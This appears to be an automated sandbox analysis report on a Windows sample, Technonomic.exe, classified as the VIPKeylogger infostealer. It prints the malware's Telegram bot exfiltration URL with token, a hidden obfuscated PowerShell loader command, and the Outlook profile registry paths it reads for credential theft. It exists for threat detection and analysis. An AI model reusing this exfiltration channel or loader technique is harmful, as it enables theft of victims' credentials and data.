Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 24-12-2024 10:26
Static task: static1
Behavioral task: behavioral1 (Sample: Technonomic.exe, Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: Technonomic.exe, Resource: win10v2004-20241007-en)
Behavioral task: behavioral3 (Sample: $PLUGINSDIR/nsExec.dll, Resource: win7-20240903-en)
Behavioral task: behavioral4 (Sample: $PLUGINSDIR/nsExec.dll, Resource: win10v2004-20241007-en)
General
- Target: Technonomic.exe
- Size: 759KB
- MD5: c174a412be6f74c3323ae8d6d4737086
- SHA1: c703daa5df8c281206a8d85b582b8a1b729748f5
- SHA256: bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
- SHA512: 9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
- SSDEEP: 12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
Malware Config
- Extracted: vipkeylogger
- https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage?chat_id=6070006284
Signatures
- VIPKeylogger
  VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
- Vipkeylogger family
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell and hides the display window.
  pid 1348, Process powershell.exe
- Loads dropped DLL (1 IoCs)
  pid 4276, Process Technonomic.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Blocklisted process makes network request (8 IoCs)
  Process msiexec.exe (pid 4988), flows 21, 23, 25, 27, 31, 34, 36, 41
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow 20: drive.google.com
  flow 21: drive.google.com
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 33: checkip.dyndns.org
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid 4988, Process msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 1348, Process powershell.exe
  pid 4988, Process msiexec.exe
- Drops file in Windows directory (1 IoCs)
  File opened for modification by Technonomic.exe: C:\Windows\resources\unthick.ini
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by Technonomic.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by powershell.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by msiexec.exe
- Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid 1348, Process powershell.exe (9 hits)
  pid 4988, Process msiexec.exe (2 hits)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid 1348, Process powershell.exe
- Suspicious use of AdjustPrivilegeToken (23 IoCs)
  pid 1348, Process powershell.exe, Tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 4988, Process msiexec.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (7 IoCs)
  PID 4276 (Technonomic.exe) wrote to memory of 1348, procid_target 82 (3 events)
  PID 1348 (powershell.exe) wrote to memory of 4988, procid_target 91 (4 events)
- outlook_office_path (1 IoCs)
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- outlook_win_path (1 IoCs)
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
1. C:\Users\Admin\AppData\Local\Temp\Technonomic.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"
   PID: 4276
   - Loads dropped DLL
   - Drops file in Windows directory
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
      PID: 1348
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\msiexec.exe
         Command line: "C:\Windows\SysWOW64\msiexec.exe"
         PID: 4988
         - Accesses Microsoft Outlook profiles
         - Blocklisted process makes network request
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
MITRE ATT&CK Enterprise v15
Downloads